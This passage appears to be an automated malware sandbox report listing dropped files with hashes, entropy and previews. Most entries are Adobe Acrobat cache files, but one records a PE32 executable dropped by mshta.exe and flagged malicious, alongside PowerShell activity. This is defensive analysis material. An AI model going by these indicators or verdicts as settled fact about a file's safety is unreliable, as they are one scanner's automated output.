                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.275849622293575
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJf8dPeUkwRe9:YvXKX+HSQW0c0nGU8Ukee9
                                                                                                        MD5:753772C602DF5C678D3D72A376427F72
                                                                                                        SHA1:6B95B24EA9A7A45D9E9A9F30B7BD6E9C1D18F194
                                                                                                        SHA-256:EC9F538A360EEEDD37FB1806DEF727E6F99BCFAAA776F8F6CF2A108B7072E21B
                                                                                                        SHA-512:9B7CC089CCD06E365926F144500897F81FF7A0FB640B7144F59C2C3DB14892B17AFBC505CEDF0BAF0EB3624143BFBE40F9626D2F3F21D334F1FE38BAC8B7EBC6
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):292
                                                                                                        Entropy (8bit):5.279040794150681
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfQ1rPeUkwRe9:YvXKX+HSQW0c0nGY16Ukee9
                                                                                                        MD5:8ACF8A54913E058C207CB5F8739ABDE8
                                                                                                        SHA1:C12A58091748F6B66AE2D55521C802BA2C92E112
                                                                                                        SHA-256:45826FDC375E49A069B0BB7F3E0393FF6F614C08CDAD7C8B70E5269F1B1838B5
                                                                                                        SHA-512:98458F86072E3DC6809C87B67CC280F5DB3BDCBC7C7B68D7C042E88B6E8D31615ACDA2EFFE00C7B4AC13BA63B694BFB9228E771B0D53C3E1760255293790E7CF
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.287339330730741
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfFldPeUkwRe9:YvXKX+HSQW0c0nGz8Ukee9
                                                                                                        MD5:BC650EE1D0762690FB18CB1F733DCB90
                                                                                                        SHA1:FA4035968596AE99964CAB410D43C97D4DF9ADE6
                                                                                                        SHA-256:5BD81CF6826C4E46DB0DAF2EC3C243A9B8A02613347964B59D2A5F094347A3BF
                                                                                                        SHA-512:D236E4755EC88293696B6B54C0911BB5A8C130AF6EEA583E46EB00D5A2F60DBB67CED9FC2850F59456DD14225E5C868B3434EDC75E5FEEBFCD6E3D2048BCA807
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.303305225400182
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfzdPeUkwRe9:YvXKX+HSQW0c0nGb8Ukee9
                                                                                                        MD5:AC1D35C3CCDFF831183FA30035FA044B
                                                                                                        SHA1:3E6A85A5AA6DEEE3629E63D226866651C4D8BC4B
                                                                                                        SHA-256:F556153C6CD5D0E5C5A49772424B6A02B10B8BCDA56B4C41AE401FBE36FF099B
                                                                                                        SHA-512:B9CCC5FB807AF885787F516B857DE3ACB94F033903AD225E9A9185417D97430A3EE417532CC8870C8FEE56B20A6CDAD5FB7F4F5F9CF4B8B44A481EE4A5C32E00
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.283615575879369
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfYdPeUkwRe9:YvXKX+HSQW0c0nGg8Ukee9
                                                                                                        MD5:A512039E0103158E93D4845EFCD44074
                                                                                                        SHA1:481F32633661E9E69D71C37BD6233C5FDB1F7CFD
                                                                                                        SHA-256:B5C53B2EE0333FBE97404092329A852E1AF65824B2BAA2843B946AA7EBFAA89F
                                                                                                        SHA-512:5979854C27C511B8406A72BCC203A98374EF7B3D52CB7047DF0D75771410CC9A821B55A3A5BE1CB995FA427A85CF04AF6FAF53F2D7338298DDDFC8D9CC24987F
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):284
                                                                                                        Entropy (8bit):5.269377490531105
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJf+dPeUkwRe9:YvXKX+HSQW0c0nG28Ukee9
                                                                                                        MD5:EE02A036B118ED1AB215B33E7C9F1B96
                                                                                                        SHA1:F3F707BA93E583C10C0C1315D8947DD1486AD36D
                                                                                                        SHA-256:F65EAF2BD70310B29F83EF8D086874A5A21C558E4979E34F11EA6C2F899CBDD0
                                                                                                        SHA-512:728DAD98C811218E77A883343D288BFE4F66C5FE3E7237F84C6CBAA23A41CDFB7613E51FCAEE60887E47077B884CCE72260DA8BC4079FC0AAC2CFA06E3569BD2
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):291
                                                                                                        Entropy (8bit):5.267275281279148
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfbPtdPeUkwRe9:YvXKX+HSQW0c0nGDV8Ukee9
                                                                                                        MD5:11C5B16BA45EFCBC0356B756F2C8C5F7
                                                                                                        SHA1:7AC7791FCCCDCBB97899CBC51B2B4EE4106ABC94
                                                                                                        SHA-256:8248AF5748660513B01F8759351A16B5ED10C5E003FC11C75E3EE59B597404A7
                                                                                                        SHA-512:FC4B24BBD4986B3B0A3E29F4CEA813EE3CB047F6FC0EA75D4A8ACF7B1DDE7A56C8F4F9A3A7D4F3556476B8C68BED11DEEAF1E148A78B10E6DFF5CFEEBD179BFA
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):287
                                                                                                        Entropy (8bit):5.270429816695237
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJf21rPeUkwRe9:YvXKX+HSQW0c0nG+16Ukee9
                                                                                                        MD5:4B9280D5BF14CB306EE737B3BF07E62E
                                                                                                        SHA1:5337F2C94DF6278532E9F1FA1D21E69583EF44CF
                                                                                                        SHA-256:CF72363ACB718A5E6D587FA6A43C0069B61EA68C69837390376AEA841023EA73
                                                                                                        SHA-512:AACB98E18906B681157B6564166C6DEC2DA69A9FF24F03D9CB47B32B710542278ED5EEFDD8C589E7F5568CEB3D3D4627B656DC8E7434B43B0715BB29269DAE49
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1090
                                                                                                        Entropy (8bit):5.665549536555726
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6X+HSQWZ1amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSc+Sn:Yvo/BgkDMUJUAh8cvMc+Sn
                                                                                                        MD5:07D7D088C7539980D9552D745202443E
                                                                                                        SHA1:249A844E158074949A1984FB495B043B0AC2F602
                                                                                                        SHA-256:C0ACAB09E2C36A322007A0F9893C7648691EE6DA207E44115F54E06E1A70A09C
                                                                                                        SHA-512:8E9C1F70C951BD900667A6EDABDB856C5D6BEA95C7D35B14338E7E4C91B289C145446CF4782501089A3788A18F33096929FF8EA4037CC95C7C5935AE5E0337F2
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):286
                                                                                                        Entropy (8bit):5.248002420979918
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJfshHHrPeUkwRe9:YvXKX+HSQW0c0nGUUUkee9
                                                                                                        MD5:098DF9A61384C8AE53E42ECBCF1535B7
                                                                                                        SHA1:99DCC6FF52B2983CAF2A57C6E8AF967C40C2A50B
                                                                                                        SHA-256:A8951F13EFEE18D4C946CC410FD3565D5D839A1476C84EF5E649F9F57196E1D3
                                                                                                        SHA-512:43FFDDA3AC09CADB3C64CF2BBAD0D73C55913990C672DC4E7810885ED1106F7251D13A49DDF8F7DA8714541AB85471C9C6D434C8C0C4161C98F86E2B74D28E56
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):282
                                                                                                        Entropy (8bit):5.263702312800073
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXPGHYegrQEH0nZiQ0YjUoAvJTqgFCrPeUkwRe9:YvXKX+HSQW0c0nGTq16Ukee9
                                                                                                        MD5:ACD096B298C130AAFD9B8385B7BAA779
                                                                                                        SHA1:41A4142A9CFBF9B8A7F813C0F8F69E195BD450A2
                                                                                                        SHA-256:1FEDB73E6642EB390E25A30B5353256D1E5A8BCE1BC45BEA502A8ED4949A4F88
                                                                                                        SHA-512:C4EB9C1B0DA5B2B9EEE3A0AE30828D638333A9BA85DEE01BE1BC253F5C9956EAD80B4461AA0DE2CA69F38C58396D9E13731971FCC4A170D18A89447DB13A39D3
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"8cb76a41-9154-4767-97e9-5654c3d8a156","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735119567970,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:e:e
                                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                        Malicious:false
                                                                                                        Preview:....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2814
                                                                                                        Entropy (8bit):5.146717399965953
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:YnglblEAAh+sQlzb/uZH9p+tmU1MrOdqG1UHw9p:6glBEAAh+sQhb/uZH9QmU1Mr61pp
                                                                                                        MD5:0880F33C144F5E3932BEC2C186FBC893
                                                                                                        SHA1:C2F99A4E2991AB4723B00D206AFA5435C2C97B0E
                                                                                                        SHA-256:C6492351EEEBC5668B9629039101C9C16C00E4F8FC6B9845A4AF52F254C5997F
                                                                                                        SHA-512:8D964CBF589E9BA2D6055BE5A12F1EB2E6B10C9D90F0400B7734D9C18EE49A739366C2BADF9BFAA260C5E4BCD208269F98C93787D5ED9146D691419AFE9086C1
                                                                                                        Malicious:false
                                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2bb273ac3a705d29ca860eb76f64a800","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734939582000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"650b226fdcdaff76fac5cdfe44904040","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734939582000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b2ed1482a30f0dd114c9c4cfba301bbe","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734939582000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"8a3eefa0a2aa55671cfa8784621a12b2","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734939582000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"8318da5b5f180e169e7a8c57a281ac8b","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":289,"ts":1734939582000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"84e6e486ad696ccd7f5afa957a883378","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":2
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12288
                                                                                                        Entropy (8bit):1.1462091724206385
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:TLhx/XYKQvGJF7ursl2WEcyRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudI8:TFl2GL7msQcsXc+XcGNFlRYIX2v3kNcy
                                                                                                        MD5:68026FAF015906C52BB19472C66B6C50
                                                                                                        SHA1:486D37DA27F3C426E6A2FF37D9D4E52CB6CB1439
                                                                                                        SHA-256:425734D6562224411E076A90D9F506B91D55579265A80E7691A2FA5DF1ED1207
                                                                                                        SHA-512:CF23B10329F67AA8E007B2948D2E761169C0CD440F8A6BDF96B50196643B82A9707D6F371FBB621EED9CAE0E839BCE3B871E21070AD8A0080C81BD1C8D5DB871
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):1.5526816785518434
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:7MLcbXc+XcGNFlRYIX2vHfqVl2GL7msMO:7YiXc+XckFPYIX2naVmsMO
                                                                                                        MD5:6DBB153200505A194E1929B1D13632BA
                                                                                                        SHA1:5313BB665FEB4606F20191761172B280B5323F91
                                                                                                        SHA-256:D9DF1ADD042ADCCFBDA2526ABED81005DCF97BA2A72C69278E428E5A762E363E
                                                                                                        SHA-512:5C51CF3F19591090A873202BEC26C9C8604934BA57425FF2062BD8AF4D1FF328F43B84332FE47FC81AB2103FCB959E38CF385C77FEC5E0F278E5FEA9BBEB53CD
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c........&..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):66726
                                                                                                        Entropy (8bit):5.392739213842091
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEg2FYwiqlFIoPTRJj93Dnn3yDFbYyu:6a6TZ44ADE2FkqlFHTx3ypbK
                                                                                                        MD5:680B87DBD3DAD3BB7F66BBFFBA2A67D7
                                                                                                        SHA1:CC35092437F88F97D7F7F5C83B6A9B29D49409EF
                                                                                                        SHA-256:C15F3DB92175652E4597D73A02F91498F9F996695B6BF1915C141593E57EAD3A
                                                                                                        SHA-512:416494FA53F522B411A00BEDE30317212848855CD9FC55A0C669E8082D7FC2C77590DA39700D70110C736AF22DE2C26BF3354F33DDCFEAB772C47996BDEAA884
                                                                                                        Malicious:false
                                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):441103
                                                                                                        Entropy (8bit):6.365912893429534
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6sXhaNDyEJXsEy64haNDyEJXsg:Hj186Nj186Oj186Bj186Xj186Z
                                                                                                        MD5:2BD68D94BB8A8AA2EB2A55AEC2F6D67F
                                                                                                        SHA1:983FAFE5DAB0FC49F198024581FAC12ABD0A60D4
                                                                                                        SHA-256:B9CF5350F612DFE60C3CB4069E857D4B6D54DA8A3D1AD17D39CA9E319CE34A7E
                                                                                                        SHA-512:F55CCA990E7A732AE10AC48239E08C502C797548C64CD37BE732DFA36CEFE0D7A71C95DF0A68C27B64C97E5DA2E59252501E297526EF65836CF4590A746A9508
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.z.{.z.{.z.{...z.z.{...z.z.{...z.z.{...z.z.{.z.{.{.{...z.z.{...{.z.{...z.z.{Rich.z.{........................PE..L............................T......P.............@..........................p......&.....@...... ..........................P...,....P..(....................`.......1..T...............................................L.......@....................text............................... ..`.data...|...........................@....idata..D).......*..................@..@.didat.......@.......$..............@....rsrc...(....P.......&..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11608
                                                                                                        Entropy (8bit):4.890472898059848
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                        Malicious:false
                                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):246
                                                                                                        Entropy (8bit):3.51161293806784
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAYlcoH:Qw946cPbiOxDlbYnuRKDlfGu
                                                                                                        MD5:6B7B27B2F25006758EEE3E8E35986644
                                                                                                        SHA1:62AB063A19C15295F7659C22F3F59319AA7C3362
                                                                                                        SHA-256:72A1F1BBD2349DA663FC2B0AB6BC26A382EC27AB243FEA66589FF949CCB0D1B9
                                                                                                        SHA-512:F4A029B20078E922987DB174607370513044DFDFC74C87523070A90C4640BE25610F824A21D881FE7BC1073DB2FAFFAC753259DE6E29417F053A1E8F6F47BFA9
                                                                                                        Malicious:false
                                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.2.:.3.9.:.4.1. .=.=.=.....
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
